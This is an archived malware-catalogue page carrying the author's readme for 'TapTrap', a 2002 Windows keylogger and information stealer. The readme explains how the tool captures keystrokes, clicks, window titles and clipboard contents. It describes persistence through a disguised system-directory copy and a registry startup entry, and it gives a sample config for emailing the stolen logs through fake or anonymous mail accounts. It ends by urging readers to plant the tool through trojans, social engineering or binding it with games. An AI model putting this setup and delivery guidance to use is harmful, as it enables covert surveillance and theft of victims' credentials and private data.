TapTrap
Released 22 years, 7 months ago. April 2002
Copyright © MegaSecurity
By RattleSnake
Informations
Author | RattleSnake |
Family | TapTrap |
Category | Information Stealer |
Version | TapTrap |
Released Date | Apr 2002, 22 years, 7 months ago. |
Language | Visual C++ |
Additional Information
Server:
size: 278.616 bytes
Author Information / Description
Project Name: TapTrap
Project Type: Keylogger and Mouse Spy
Project Compiler: Microsoft Visual C++ 6.0
Project Environment: Microsoft Windows 2000 Professional
Note: I will use the word "user" instead of "victim", just
because this wasn't made to be c/p stuff for scriptkiddies.
This is a piece of code which should help you understand
C/C++ and the Windows API a bit more.
#include <stddisclaimer>
I do not support any illegal activities you perform with this
Software. Within theis readme file I will explain TapTrap
from the view of a malicious Intruder, but you should only
use the software for security auditing, securing your own
machines or just to learn about the code. I am not responsible
for anything you do with this program, malicious or not.
Now let's finally start ....
TapTrap is a Keylogger which uses the Windows API to log:
a) Keystrokes as original ASCII characters,
independant from the user's language.
b) Window Names when being activated, so you know
in which window / which context the buttons
were pressed.
c) Mouse clicks. When the user clicks the button
"Cancel" in some window with the left mouse button,
TapTrap will record that the user clicked his
left mouse button on a window class named "button"
with the caption "Cancel". Fine, hm?
d) On Copy/Paste/Cut actions, TapTrap displays the
Contents of the users clipboard.
Furthermore, the Logs are sent to you from the remote user's
machine automatically, using an email account specified by you
or just trying different possible mailservers.
Ok, you certainly want to know how to get it work. There are
only two steps necessary to set up the Keylogger:
1) edit the configuration
2) run it on the remote machine
As soon as the Program is being run on the remote machine, it
copies its executable and the configuration file to the system
directory, runs this copy of itself and exits. It adds an entry
to the registry to be executed at startup and starts logging
immediately. When an error occurs or the Application closes
due to other problems, it attempts to restart itself. When it
has collected enough logfiles on the users pc, it waits untill
the user connects to hte internet and sends the files via email.
The logs are stored in HTML format to make reading them rather
comfortable. I suppose whetting your appetite was successfull
already, so how to configure and run this baby ??
1) Configuration
�������������
A configuration file, config.ini, comes with this Program.
Editing this file is the easy way to configure TapTrap, but
the ini file has to be in the same directory as the executable
when the program is run on the remote machine in order to
make configuration possible.
The other way to configure TapTrap is to get a Windows compiler,
edit the Header file configure.h and to compile, link and bind TapTrap
again. However, only those of you who know how to code in C/C++
should do that. I assume those who know C/C++ also understand
this header file, and thus I wil only explain config.ini so
far:
# Start Config ini sample
[mail_receiver]
[email protected]
display_name=RattleSnake
[mail_send]
[email protected]
password_required=yes
password=PASSWORD
[email protected]
server=mail.gmx.net
[makefile]
filename=\Win32Services.exe
registryname=Win32sstart
[limits]
autobackup=20
timermax=20
storelogs=5
# End Config ini sample
sendto_email is the email that the Keylogger's logs will be sent to.
display_name it your name. Enter anything you want ;). Easy as a
drunk nympho, quoting good old tuna - but how about the next section?
Well, here you have to specify an Email account to send the email
from. display_adress is the adress of this account, password and
username are password and username (duh) and server specifies the
SMTP Server (Mailserver) of the provider. password and username are
stored in plaintext, exactly - and they are only used if password_required
is set to "yes". I strongly suggest you do not use your own email account
but create a new, fake account at yahoo, gmx or anywhere else.
You can, however, also find an emailserver which allows you to send
email anonymously and use that one. If you want TapTrap to try out
multiple mailservers - no problem!
# Start Config ini sample
...
[mail_send]
server=rome.ccomm.com;wisdom.psinet.net.au;emout17.mail.aol.com;mdr.de
#End Config ini sample
Exactly, you can simply add multiple servers by separating them with
semicolons or commas. TapTrap will connect to each of them and send the
email once it connected successfully. Now on to the makefile section
These are fake names for TpTrap when it writes itself to the system
directory and the registry. filename has to start with a backslash, just
because I am a lazy coder. Check the code if you are terribly interested.
filename is the name of the TapTrap exectable within the remote users
system directory which will be run at startup. registryname is the name
of the entry in the remote users registry which starts the executable
at windows startup. Still with me? Good.
autobackup is the ammount of keys a user can press untill the current
logfile is backuped, prevents from loosing all logged data when the program
crashes somehow. For all those of you who read and understand the code:
timermax is used to randomize the timer loop which records the keytaps, check
the code for more. Leave it as it is, thats what I would suggest. It should
be a value between 15 and 50. storelogs is more interesting, it defines how
many logs are stored on the remote machine untill TapTrap attempts to send
them by email.
That's it. Configuration finished. A little tip for windows 2000 users:
- Press Start
- Enter "iexpress.exe"
- Click "Run"
You can use this setup client to create neat setup applications. Just add
TapTrap.exe and the configuration file and choose TapTrap.exe as the
installation command. Make a self extracting setup exe and use this one -
Easy as a drunk nypho, right!
2) Run it on the remote machine
����������������������������
Come on kids, use a Trojan, social engineer a bit and install it yourself,
or just send it to rather stupid people. Or get a binder and bind it with some
game, thats a nice idea as well ...
- RattleSnake
If you recognize any personal information on this page and wish to have it removed or redacted, please contact us at jplesueur@phrozen.io. We are committed to protecting your privacy in accordance with GDPR regulations.